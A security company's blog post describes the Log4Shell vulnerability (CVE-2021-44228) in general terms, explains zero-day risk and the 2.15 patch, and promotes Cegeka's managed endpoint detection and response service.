Last week a vulnerability of Log4j was disclosed. This vulnerability, also referred to as CVE-2021-44228 or Log4Shell, is extremely dangerous, as Log4j is used in internet facing services and software. As such, the hackers can exploit the vulnerability remotely. In Germany the authorities already gave out a code red warning for service outages due to this vulnerability.
0-days vulnerabilities and the associated risks
When the Log4Shell exploit code was made publicly available last week Thursday, there was no patch available. This is what’s called a 0-day vulnerability. Attacks on these 0-day vulnerabilities are extremely dangerous for companies because they’re unknown and can be very difficult to detect, making them a serious security risk. If attackers manage to successfully exploit this vulnerability on one of your servers, they gain the ability to potentially take full control of your system and could grant access to sensitive data and passwords.
Past week a patch was released that fixes the Log4j vulnerability (Log4j version 2.15). Security teams have been installing this (when and if possible) on vulnerable systems over the last days. However this was not always possible, it takes time to install and is by definition always too late.
How can EDR help against Log4Shell and other future 0-days?
Organizations can prepare for these 0-days attacks by deploying an Endpoint Detection and Response (EDR) technology. EDR is your alarm system which will detect ‘thieves sneaking in through a backdoor that was accidentally left unlocked.’
An EDR includes detection for malicious activities by generating alarms. This will trigger the security teams to start investigations. They can gain immediate visibility into a possible attack, even if it bypasses other defenses.
EDR also includes exploit mitigation technology that can prevent the successful exploitation of the underlying operating system. As a result, an adversary is prevented from using common exploitation techniques because the execution of exploit code is stopped at the endpoint, in real time, thereby blocking zero-day attacks that use previously undiscovered malware.
Peace of mind needed? Explore how Cegeka can help!
Cegeka Managed EDR services includes the installation and the management of your EDR. The Cegeka Security Operations Center will monitor 24x7 the EDR alarms and will take immediately the appropriate containment actions.
Our team of Security Advisors will help you decide on the most effective mitigation for your infrastructure.
If you are (in danger of being) breached or if you would like to get more information on how to prepare for future 0-days feel free to contact us directly.